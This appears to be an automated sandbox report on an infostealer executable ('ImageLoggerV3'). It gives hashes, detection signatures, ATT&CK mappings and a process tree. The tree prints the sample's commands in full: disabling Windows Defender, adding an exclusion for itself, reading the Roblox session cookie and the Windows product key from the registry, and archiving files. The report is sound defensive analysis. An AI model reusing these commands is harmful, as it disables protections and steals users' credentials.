ebeef30a8de1581089b4ed96dd6785165de084f7a8345bebf9ced80fc91812d4

Analysis

max time kernel
90s
max time network
92s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
13/02/2024, 22:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ImageLoggerV3 (1).exe
Size

5.0MB
MD5

da79b808c5703ad8ab3baca5108f50d8
SHA1

60240c4c4adcaf6116975f4a367d037d0635fc57
SHA256

ebeef30a8de1581089b4ed96dd6785165de084f7a8345bebf9ced80fc91812d4
SHA512

910cd54194bf1e0d0dc1b6a83ce685eee024a70a2ea369cd824a527bb04fad48b23be66c6b7f3e67ce66d05ddde9e35cf9ace875e06c4471553685762b172397
SSDEEP

98304:1FywqhY8jY9hoyAvEn/uM4tjfM7ZUZzHuI4C9L8Lu/NNBMyp3UTs2vT2:Aa9hoy6EnmM+jfqZUZ6I4yYLcUyjUT2

Score

7^/10

spyware stealer upx

Malware Config

Signatures

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0006000000023224-21.dat	acprotect
behavioral1/files/0x0007000000023208-27.dat	acprotect
behavioral1/files/0x0006000000023222-31.dat	acprotect
behavioral1/files/0x0006000000023223-35.dat	acprotect
behavioral1/files/0x0006000000023221-34.dat	acprotect
behavioral1/files/0x0007000000023205-41.dat	acprotect
behavioral1/files/0x0006000000023229-40.dat	acprotect
behavioral1/files/0x0006000000023228-39.dat	acprotect
behavioral1/files/0x0006000000023227-38.dat	acprotect
behavioral1/files/0x000600000002321e-48.dat	acprotect
behavioral1/files/0x000600000002321d-47.dat	acprotect
behavioral1/files/0x000600000002321c-46.dat	acprotect
behavioral1/files/0x000600000002321b-45.dat	acprotect
behavioral1/files/0x000600000002321a-44.dat	acprotect
behavioral1/files/0x0006000000023219-43.dat	acprotect
behavioral1/files/0x0006000000023218-42.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
2808	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe
4424	ImageLoggerV3 (1).exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023224-21.dat	upx
behavioral1/memory/4424-25-0x0000000074840000-0x0000000074C71000-memory.dmp	upx
behavioral1/files/0x0007000000023208-27.dat	upx
behavioral1/memory/4424-30-0x0000000074790000-0x00000000747AF000-memory.dmp	upx
behavioral1/memory/4424-32-0x0000000074780000-0x000000007478C000-memory.dmp	upx
behavioral1/files/0x0006000000023222-31.dat	upx
behavioral1/files/0x0006000000023223-35.dat	upx
behavioral1/files/0x0006000000023221-34.dat	upx
behavioral1/files/0x0007000000023205-41.dat	upx
behavioral1/files/0x0006000000023229-40.dat	upx
behavioral1/files/0x0006000000023228-39.dat	upx
behavioral1/files/0x0006000000023227-38.dat	upx
behavioral1/files/0x000600000002321e-48.dat	upx
behavioral1/files/0x000600000002321d-47.dat	upx
behavioral1/files/0x000600000002321c-46.dat	upx
behavioral1/files/0x000600000002321b-45.dat	upx
behavioral1/files/0x000600000002321a-44.dat	upx
behavioral1/files/0x0006000000023219-43.dat	upx
behavioral1/files/0x0006000000023218-42.dat	upx
behavioral1/memory/4424-54-0x0000000074750000-0x0000000074777000-memory.dmp	upx
behavioral1/memory/4424-56-0x0000000074730000-0x0000000074748000-memory.dmp	upx
behavioral1/memory/4424-59-0x0000000074710000-0x0000000074725000-memory.dmp	upx
behavioral1/memory/4424-60-0x00000000745D0000-0x0000000074705000-memory.dmp	upx
behavioral1/memory/4424-62-0x00000000745B0000-0x00000000745C6000-memory.dmp	upx
behavioral1/memory/4424-64-0x0000000074560000-0x000000007456C000-memory.dmp	upx
behavioral1/memory/4424-66-0x0000000074530000-0x0000000074558000-memory.dmp	upx
behavioral1/memory/4424-70-0x0000000074840000-0x0000000074C71000-memory.dmp	upx
behavioral1/memory/4424-71-0x0000000074790000-0x00000000747AF000-memory.dmp	upx
behavioral1/memory/4424-72-0x0000000074490000-0x0000000074524000-memory.dmp	upx
behavioral1/memory/4424-77-0x00000000741B0000-0x00000000741BC000-memory.dmp	upx
behavioral1/memory/4424-75-0x0000000074230000-0x000000007448A000-memory.dmp	upx
behavioral1/memory/4424-79-0x0000000074780000-0x000000007478C000-memory.dmp	upx
behavioral1/memory/4424-78-0x00000000741C0000-0x00000000741D0000-memory.dmp	upx
behavioral1/memory/4424-81-0x0000000074090000-0x00000000741A4000-memory.dmp	upx
behavioral1/memory/4424-82-0x0000000074710000-0x0000000074725000-memory.dmp	upx
behavioral1/memory/4424-117-0x00000000745D0000-0x0000000074705000-memory.dmp	upx
behavioral1/memory/4424-151-0x00000000745B0000-0x00000000745C6000-memory.dmp	upx
behavioral1/memory/1324-152-0x00000000051A0000-0x00000000051B0000-memory.dmp	upx
behavioral1/memory/4424-167-0x0000000074530000-0x0000000074558000-memory.dmp	upx
behavioral1/memory/4424-242-0x0000000074840000-0x0000000074C71000-memory.dmp	upx
behavioral1/memory/4424-243-0x0000000074790000-0x00000000747AF000-memory.dmp	upx
behavioral1/memory/4424-257-0x0000000074710000-0x0000000074725000-memory.dmp	upx
behavioral1/memory/4424-258-0x00000000745D0000-0x0000000074705000-memory.dmp	upx
behavioral1/memory/4424-266-0x0000000074090000-0x00000000741A4000-memory.dmp	upx
behavioral1/memory/4424-275-0x0000000074840000-0x0000000074C71000-memory.dmp	upx
behavioral1/memory/4424-277-0x0000000074780000-0x000000007478C000-memory.dmp	upx
behavioral1/memory/4424-278-0x0000000074750000-0x0000000074777000-memory.dmp	upx
behavioral1/memory/4424-276-0x0000000074790000-0x00000000747AF000-memory.dmp	upx
behavioral1/memory/4424-279-0x0000000074730000-0x0000000074748000-memory.dmp	upx
behavioral1/memory/4424-280-0x0000000074710000-0x0000000074725000-memory.dmp	upx
behavioral1/memory/4424-281-0x00000000745D0000-0x0000000074705000-memory.dmp	upx
behavioral1/memory/4424-284-0x0000000074530000-0x0000000074558000-memory.dmp	upx
behavioral1/memory/4424-283-0x0000000074560000-0x000000007456C000-memory.dmp	upx
behavioral1/memory/4424-282-0x00000000745B0000-0x00000000745C6000-memory.dmp	upx
behavioral1/memory/4424-285-0x0000000074490000-0x0000000074524000-memory.dmp	upx
behavioral1/memory/4424-286-0x0000000074230000-0x000000007448A000-memory.dmp	upx
behavioral1/memory/4424-287-0x00000000741C0000-0x00000000741D0000-memory.dmp	upx
behavioral1/memory/4424-288-0x00000000741B0000-0x00000000741BC000-memory.dmp	upx
behavioral1/memory/4424-289-0x0000000074090000-0x00000000741A4000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3960	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
856	tasklist.exe
2444	tasklist.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3972	powershell.exe
1324	powershell.exe
1324	powershell.exe
3972	powershell.exe
2656	powershell.exe
2656	powershell.exe
4068	powershell.exe
4068	powershell.exe
2396	powershell.exe
2396	powershell.exe
4568	powershell.exe
4568	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	2444	tasklist.exe
Token: SeDebugPrivilege	856	tasklist.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeIncreaseQuotaPrivilege	3204	WMIC.exe
Token: SeSecurityPrivilege	3204	WMIC.exe
Token: SeTakeOwnershipPrivilege	3204	WMIC.exe
Token: SeLoadDriverPrivilege	3204	WMIC.exe
Token: SeSystemProfilePrivilege	3204	WMIC.exe
Token: SeSystemtimePrivilege	3204	WMIC.exe
Token: SeProfSingleProcessPrivilege	3204	WMIC.exe
Token: SeIncBasePriorityPrivilege	3204	WMIC.exe
Token: SeCreatePagefilePrivilege	3204	WMIC.exe
Token: SeBackupPrivilege	3204	WMIC.exe
Token: SeRestorePrivilege	3204	WMIC.exe
Token: SeShutdownPrivilege	3204	WMIC.exe
Token: SeDebugPrivilege	3204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3204	WMIC.exe
Token: SeRemoteShutdownPrivilege	3204	WMIC.exe
Token: SeUndockPrivilege	3204	WMIC.exe
Token: SeManageVolumePrivilege	3204	WMIC.exe
Token: 33	3204	WMIC.exe
Token: 34	3204	WMIC.exe
Token: 35	3204	WMIC.exe
Token: 36	3204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3204	WMIC.exe
Token: SeSecurityPrivilege	3204	WMIC.exe
Token: SeTakeOwnershipPrivilege	3204	WMIC.exe
Token: SeLoadDriverPrivilege	3204	WMIC.exe
Token: SeSystemProfilePrivilege	3204	WMIC.exe
Token: SeSystemtimePrivilege	3204	WMIC.exe
Token: SeProfSingleProcessPrivilege	3204	WMIC.exe
Token: SeIncBasePriorityPrivilege	3204	WMIC.exe
Token: SeCreatePagefilePrivilege	3204	WMIC.exe
Token: SeBackupPrivilege	3204	WMIC.exe
Token: SeRestorePrivilege	3204	WMIC.exe
Token: SeShutdownPrivilege	3204	WMIC.exe
Token: SeDebugPrivilege	3204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3204	WMIC.exe
Token: SeRemoteShutdownPrivilege	3204	WMIC.exe
Token: SeUndockPrivilege	3204	WMIC.exe
Token: SeManageVolumePrivilege	3204	WMIC.exe
Token: 33	3204	WMIC.exe
Token: 34	3204	WMIC.exe
Token: 35	3204	WMIC.exe
Token: 36	3204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4216	WMIC.exe
Token: SeSecurityPrivilege	4216	WMIC.exe
Token: SeTakeOwnershipPrivilege	4216	WMIC.exe
Token: SeLoadDriverPrivilege	4216	WMIC.exe
Token: SeSystemProfilePrivilege	4216	WMIC.exe
Token: SeSystemtimePrivilege	4216	WMIC.exe
Token: SeProfSingleProcessPrivilege	4216	WMIC.exe
Token: SeIncBasePriorityPrivilege	4216	WMIC.exe
Token: SeCreatePagefilePrivilege	4216	WMIC.exe
Token: SeBackupPrivilege	4216	WMIC.exe
Token: SeRestorePrivilege	4216	WMIC.exe
Token: SeShutdownPrivilege	4216	WMIC.exe
Token: SeDebugPrivilege	4216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4216	WMIC.exe
Token: SeRemoteShutdownPrivilege	4216	WMIC.exe
Token: SeUndockPrivilege	4216	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5056 wrote to memory of 4424	5056	ImageLoggerV3 (1).exe	85
PID 5056 wrote to memory of 4424	5056	ImageLoggerV3 (1).exe	85
PID 5056 wrote to memory of 4424	5056	ImageLoggerV3 (1).exe	85
PID 4424 wrote to memory of 3504	4424	ImageLoggerV3 (1).exe	89
PID 4424 wrote to memory of 3504	4424	ImageLoggerV3 (1).exe	89
PID 4424 wrote to memory of 3504	4424	ImageLoggerV3 (1).exe	89
PID 4424 wrote to memory of 2196	4424	ImageLoggerV3 (1).exe	88
PID 4424 wrote to memory of 2196	4424	ImageLoggerV3 (1).exe	88
PID 4424 wrote to memory of 2196	4424	ImageLoggerV3 (1).exe	88
PID 3504 wrote to memory of 3972	3504	cmd.exe	90
PID 3504 wrote to memory of 3972	3504	cmd.exe	90
PID 3504 wrote to memory of 3972	3504	cmd.exe	90
PID 2196 wrote to memory of 1324	2196	cmd.exe	91
PID 2196 wrote to memory of 1324	2196	cmd.exe	91
PID 2196 wrote to memory of 1324	2196	cmd.exe	91
PID 4424 wrote to memory of 4036	4424	ImageLoggerV3 (1).exe	92
PID 4424 wrote to memory of 4036	4424	ImageLoggerV3 (1).exe	92
PID 4424 wrote to memory of 4036	4424	ImageLoggerV3 (1).exe	92
PID 4424 wrote to memory of 468	4424	ImageLoggerV3 (1).exe	93
PID 4424 wrote to memory of 468	4424	ImageLoggerV3 (1).exe	93
PID 4424 wrote to memory of 468	4424	ImageLoggerV3 (1).exe	93
PID 4036 wrote to memory of 2444	4036	cmd.exe	96
PID 4036 wrote to memory of 2444	4036	cmd.exe	96
PID 4036 wrote to memory of 2444	4036	cmd.exe	96
PID 468 wrote to memory of 856	468	cmd.exe	97
PID 468 wrote to memory of 856	468	cmd.exe	97
PID 468 wrote to memory of 856	468	cmd.exe	97
PID 4424 wrote to memory of 4932	4424	ImageLoggerV3 (1).exe	99
PID 4424 wrote to memory of 4932	4424	ImageLoggerV3 (1).exe	99
PID 4424 wrote to memory of 4932	4424	ImageLoggerV3 (1).exe	99
PID 4932 wrote to memory of 2656	4932	cmd.exe	101
PID 4932 wrote to memory of 2656	4932	cmd.exe	101
PID 4932 wrote to memory of 2656	4932	cmd.exe	101
PID 4424 wrote to memory of 1632	4424	ImageLoggerV3 (1).exe	102
PID 4424 wrote to memory of 1632	4424	ImageLoggerV3 (1).exe	102
PID 4424 wrote to memory of 1632	4424	ImageLoggerV3 (1).exe	102
PID 1632 wrote to memory of 4068	1632	cmd.exe	104
PID 1632 wrote to memory of 4068	1632	cmd.exe	104
PID 1632 wrote to memory of 4068	1632	cmd.exe	104
PID 4424 wrote to memory of 3372	4424	ImageLoggerV3 (1).exe	105
PID 4424 wrote to memory of 3372	4424	ImageLoggerV3 (1).exe	105
PID 4424 wrote to memory of 3372	4424	ImageLoggerV3 (1).exe	105
PID 3372 wrote to memory of 2808	3372	cmd.exe	107
PID 3372 wrote to memory of 2808	3372	cmd.exe	107
PID 4424 wrote to memory of 1520	4424	ImageLoggerV3 (1).exe	110
PID 4424 wrote to memory of 1520	4424	ImageLoggerV3 (1).exe	110
PID 4424 wrote to memory of 1520	4424	ImageLoggerV3 (1).exe	110
PID 1520 wrote to memory of 3204	1520	cmd.exe	112
PID 1520 wrote to memory of 3204	1520	cmd.exe	112
PID 1520 wrote to memory of 3204	1520	cmd.exe	112
PID 4424 wrote to memory of 4456	4424	ImageLoggerV3 (1).exe	113
PID 4424 wrote to memory of 4456	4424	ImageLoggerV3 (1).exe	113
PID 4424 wrote to memory of 4456	4424	ImageLoggerV3 (1).exe	113
PID 4456 wrote to memory of 4216	4456	cmd.exe	115
PID 4456 wrote to memory of 4216	4456	cmd.exe	115
PID 4456 wrote to memory of 4216	4456	cmd.exe	115
PID 4424 wrote to memory of 4948	4424	ImageLoggerV3 (1).exe	116
PID 4424 wrote to memory of 4948	4424	ImageLoggerV3 (1).exe	116
PID 4424 wrote to memory of 4948	4424	ImageLoggerV3 (1).exe	116
PID 4948 wrote to memory of 2152	4948	cmd.exe	118
PID 4948 wrote to memory of 2152	4948	cmd.exe	118
PID 4948 wrote to memory of 2152	4948	cmd.exe	118
PID 4424 wrote to memory of 2404	4424	ImageLoggerV3 (1).exe	120
PID 4424 wrote to memory of 2404	4424	ImageLoggerV3 (1).exe	120

C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5056
- C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe
  "C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3504
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLoggerV3 (1).exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4036
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe a -r -hp"neelarya" "C:\Users\Admin\AppData\Local\Temp\j9G4Y.zip" *"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3372
  - - C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI50562\rar.exe a -r -hp"neelarya" "C:\Users\Admin\AppData\Local\Temp\j9G4Y.zip" *
      4⤵
      Executes dropped EXE
      PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3932
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3960
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4676
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
67555cc09af1733be30dba903ccb1c2c

SHA1
2f80d9ff763a892ebda160248085c333513f3147

SHA256
d36671e155ab09b98441df154e662425f18ee4394d67fd593c2a24bbc5db53f0

SHA512
ca15562b01b6e0912bc0fa1452b77173e24e4df14f9b43f75bef7fbb485332e39f622d668a0aef3eee73bfe2e9a8ab44807975152bcd8d7de9af73021ce0c228

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
bf0946511e189d3deeca5633c0aa6c11

SHA1
cc5d13d595c582ed8951bef689af2ed4c3e5d994

SHA256
37f08f1b006018344ab31cb08096b275c7c55c5189dd6b37529457728358de6d

SHA512
f0946bbd6334a50be7322fac4c0e8a2a4627f04d844fe276e8b5c767fdc00bc226736bcf8dbaebcaa60bbcfac5c9dcccf3199b704ed13d3c347254de14adae6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a2c882cf0305aa4e8a97b5b5ab41e496

SHA1
6ac1fddbfcec56a7fcd9b6016a997781f9a62b0c

SHA256
e501d55804d9c40a0540d62bbdd6e2bb3c32a061d3a9a915014f08d47c45e0a5

SHA512
2cc029cccc5bec1ea860c655e05a2e64fe40861e481c338cd6e86c5f7df7603444cbef50eccc7ff277daedb6d68c88f34e84ff7922a5cce6dbaaed0820e3823e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
3f4a6d1279a1f3abbde5cbc7197f63b9

SHA1
6d393ce08e84d7460a3fa9e3ec9ca035d036d8ee

SHA256
a736946b58cdf9bb6d6ee4c1959d6985f00a63d48263cac757c1743f2b3962ac

SHA512
022195223c1bf455a96e62d6e8d8f75c2fe61aceabb531ed75f8cc5e7093f4334153dac225184996abc8866882a58e16f0e766f14c8cff51dc0154959a4ac843

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\VCRUNTIME140.dll

Filesize
78KB

MD5
1e6e97d60d411a2dee8964d3d05adb15

SHA1
0a2fe6ec6b6675c44998c282dbb1cd8787612faf

SHA256
8598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9

SHA512
3f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_bz2.pyd

Filesize
43KB

MD5
e24fd981c2a2ecb4484a915cac0dab83

SHA1
9749e9cec26ef1ee1eb864e84394e257387a1d9b

SHA256
9e0350aa39fb6f9a97a07153948f7330f8533469647fa8a95a9ad4fc849d1d0f

SHA512
5bab9ba4fc9f818e49eb57df63bf10b37dc57f6a1005ada5e7ae507a8b131223a68b607f04a5bcba563655ce24ef6ef77e5083cdc88f640a6e7c1e68349b5095

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_ctypes.pyd

Filesize
51KB

MD5
05b83399b84400e72fe28197f061f31e

SHA1
c4cc31153f0a45b70bff195b648d17f6163a70ff

SHA256
7bec7a1ad04235c652052d0e4eef9c4b8154d459a270ca3583608699f8a845ac

SHA512
06ff60772226fb4efde03e3cdb2b7d5cf4bfb3d51866c3457ac2d9d3a4d1f8e0283896fe4119fc80d29c067eb9e9be3c863e9fb013663eff2048861f1dbffab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_decimal.pyd

Filesize
77KB

MD5
fc45534f5b330a922ae2b0a40dea2735

SHA1
d1dd6755480e65fe9d496adf5e5d8758c35c55f9

SHA256
683c2c10b8c310a23d9f4273ae34e7d4d7869dc33d229c57070dc69ef3a806a0

SHA512
196e446b1879fb62d83d4f5ac4ea1fd736b0a582968ffb6c7052fea12f50b6e3eadb447a6ba4e16a05efef8370332f66316b49ea0a745a828b6519bc77857aa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_hashlib.pyd

Filesize
28KB

MD5
0ff27188bc4c5c723875a04606f0598c

SHA1
2bcd02b3c3292941cabba7b8ae65099d2c71f2ec

SHA256
a60fe3c81e224db96c9ca9ca0f3d8c2962ed4b0922f429f852dbfbb4bbc7cbed

SHA512
5c5923783b17efeabfe6343f3d51b038ea57ffaa09a1c33e55386943f2b51eeac89437b3037c88430257e5a00b0470340a7c93e173c64d315c81eb7fcd12b580

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_lzma.pyd

Filesize
78KB

MD5
4bb8f1f3e1497e34485eda4846a308a4

SHA1
b077674823782c12f8eaad25dd7c6f2808459055

SHA256
e08ea3c7290acd57f2754922dc7d05d0efa14930a72ea080ddb91b4bbf2a054f

SHA512
d3f8babf80c3f7677e25b489927c595e3bc45a269db7c3e79326b9b86767c5d086f7e27057358be9570823c0315c7895c2926cfa1bcb030f7996a587620d0faa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_queue.pyd

Filesize
23KB

MD5
bc08cf5259478a3d48575f3e2e7c3ba7

SHA1
5b1f74771498bdc09ae45527c7f4b578a6463433

SHA256
95f2f31b912c9a2e3d20daa92149e442e48751b2eab0afe7c54d9bc7b191553d

SHA512
27a0b21d3d65299309be614b619cd9ebf48e08ae60d37cd7cfe06368134c0ea210779b25a3d1094f204c0f24d3cd8e6c774c57b3863715b606cf24d8f4ee44ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50562\_socket.pyd

Filesize
37KB

MD5
bc7abf3f1d0f52cff7b492233a0249b4

SHA1
a9d9bf74f9c53753f58f3163935a427b146351d0

SHA256
